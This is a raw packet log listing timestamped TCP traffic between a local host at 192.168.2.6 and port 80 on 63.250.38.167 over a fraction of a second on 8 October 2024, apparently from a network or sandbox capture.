Oct 8, 2024 11:31:26.496179104 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496223927 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.496228933 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496260881 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496296883 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496308088 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.496330976 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.498868942 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584067106 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584094048 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584105968 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584117889 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584130049 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584141970 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584152937 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584163904 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584176064 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584183931 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584187031 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584198952 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584211111 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584222078 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584232092 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584238052 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584243059 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584249020 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584263086 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584263086 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584311008 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584321022 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584336042 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584340096 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584352016 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584362030 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584362984 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584374905 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584374905 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584387064 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584398031 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584408998 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584410906 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584420919 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584420919 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584433079 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584439993 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.584445953 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584503889 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584518909 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.584533930 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.586774111 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586786985 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586800098 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586802006 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.586937904 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586949110 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586961031 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586967945 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.586971998 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586983919 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.586994886 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.586994886 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587002039 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587013960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587017059 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587025881 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587035894 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587141037 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587166071 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587835073 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587847948 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587860107 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587860107 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587871075 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587883949 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587894917 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587896109 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.587954998 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587954998 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.587987900 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588001013 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588012934 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588025093 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588056087 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.588164091 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588176012 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588186979 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588196039 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.588531017 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.588885069 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588896036 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588908911 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.588921070 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589067936 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589080095 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589092016 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589098930 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589102983 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589114904 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589121103 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589126110 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589138031 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589154959 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589154959 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589219093 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589231014 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589246035 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589920044 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589931965 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589942932 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589951038 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589955091 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589967966 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589978933 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.589982986 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.589992046 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590003967 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590014935 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590018988 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590028048 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590029001 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590051889 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590069056 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590080976 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590095043 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590101957 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590580940 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590593100 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590605974 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590745926 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590758085 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590769053 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590775013 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590781927 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590792894 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590804100 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590806961 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590816975 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590828896 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590840101 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590845108 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590864897 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.590922117 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590935946 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.590953112 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.591639996 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591653109 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591665030 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591669083 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.591687918 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.591801882 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591814041 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591825962 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591837883 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591953039 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591964960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591978073 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.591978073 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.591988087 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.592000008 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.592012882 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.592015028 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.592030048 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.592281103 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.598171949 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.676932096 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677037954 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677048922 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677059889 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677098036 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677109957 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677120924 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677124977 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677133083 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677145004 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677155972 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677162886 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677175999 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677234888 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677247047 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677258015 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677259922 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677274942 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677298069 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677335024 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677423000 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677445889 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677458048 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677473068 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677486897 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677498102 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677508116 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.677510977 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677525043 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677532911 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.677994013 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678004980 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678016901 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678025961 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678037882 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678049088 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678061962 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678062916 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678112984 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678141117 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678155899 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678190947 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678365946 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678378105 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678389072 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678400040 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678411961 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678415060 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678431034 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678488970 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678534985 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678555012 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678565025 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678575993 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678586006 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678596973 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678606033 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678608894 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678617954 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678631067 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678641081 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678654909 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678705931 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678715944 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678729057 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678739071 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678755999 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678767920 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678777933 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678781033 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678792953 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678803921 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.678821087 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.678874016 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.679491997 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679502964 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679513931 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679522991 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679533958 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679544926 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679555893 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679558992 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.679569006 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679580927 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.679580927 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679591894 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679603100 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679614067 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679625988 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.679647923 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679660082 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679663897 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.679685116 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.679825068 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679840088 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.679852962 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680056095 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680068016 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680077076 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680078030 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680090904 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680100918 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680349112 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680615902 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680627108 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680641890 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680654049 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680748940 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680785894 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680790901 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680804014 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680814028 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680820942 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680825949 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680831909 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680836916 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680843115 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680852890 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680861950 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680866003 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680880070 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.680903912 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680903912 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.680948973 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681014061 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.681190014 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681202888 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681310892 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.681361914 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681375027 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681605101 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.681936979 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681948900 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681960106 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681971073 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681982040 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.681993961 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682004929 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682005882 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.682009935 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682020903 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682033062 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682071924 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682081938 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682085037 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.682100058 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682107925 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.682111025 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682122946 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682132006 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.682133913 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682145119 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.682156086 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.682432890 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.731750011 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767343998 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767358065 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767379045 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767396927 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767407894 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767417908 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767430067 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767455101 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767455101 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767493963 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767505884 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767518044 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767530918 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767535925 CEST	49996	80	192.168.2.6	63.250.38.167
